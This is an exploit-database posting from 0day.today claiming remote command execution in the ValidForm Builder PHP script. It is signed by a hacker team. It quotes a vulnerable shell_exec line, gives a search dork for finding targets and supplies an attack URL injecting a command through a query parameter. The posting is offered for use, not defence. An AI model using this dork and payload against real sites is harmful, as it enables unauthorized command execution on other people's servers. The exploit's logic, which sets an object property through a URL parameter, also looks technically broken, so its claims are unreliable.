[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ValidForm Builder script Remote Command Execution

Author
HaCkEr arar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13454
Category
web applications
Date add
23-07-2010
Platform
php
=================================================
ValidForm Builder script Remote Command Execution
=================================================


# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script:
http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com <Qalaa%3Aem9@live.com>
:::::::::::::::::::::::::
=================Exploit=================
 
-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o
$this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466
 
----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"
 
http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id<http://%7blocalhost%7d/%7Bpath%7D/libraries/ValidForm/class.phpcaptcha.php?this=id>
 
---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0
 
and My friends Others and My friends in MSN
EnJoY o_O



#  0day.today [2024-07-05]  #